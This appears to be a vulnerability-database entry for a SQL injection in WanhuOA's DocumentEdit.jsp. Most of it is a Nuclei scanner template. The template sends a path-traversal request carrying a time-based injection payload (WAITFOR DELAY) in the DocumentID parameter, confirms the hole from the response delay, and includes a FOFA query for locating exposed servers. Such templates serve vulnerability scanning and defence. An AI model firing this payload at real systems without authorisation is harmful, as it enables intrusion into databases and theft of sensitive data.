wanhu-documentedit-sqli: WanhuOA DocumentEdit.jsp - SQL Injection

2025-08-01 WanhuOA PoC Public

Description

The Wanhu OA DocumentEdit.jsp file has a SQL injection vulnerability. An attacker can perform SQL injection into the database by sending a special request package and obtain sensitive information on the server.

PoC

id: wanhu-documentedit-sqli

info:
  name: WanhuOA DocumentEdit.jsp - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    The Wanhu OA DocumentEdit.jsp file has a SQL injection vulnerability. An attacker can perform SQL injection into the database by sending a special request package and obtain sensitive information on the server.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20DocumentEdit.jsp%20SQL注入漏洞.html
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DocumentEdit.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="万户网络-ezOFFICE"
  tags: time-based-sqli,wanhu,sqli,vuln

http:
  - raw:
      - |
        @timeout: 15s
        GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains_all(body, "iSignature", "DoYFSignature")'
        condition: and
# digest: 4b0a00483046022100d4c968bd0e2f633df5ddc1edb24dc668ca060d4aa9f818873607559654c6c04a02210081e06d49515c36bb4b0d70aa3c6968c932498500e685f2724c81831153958836:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities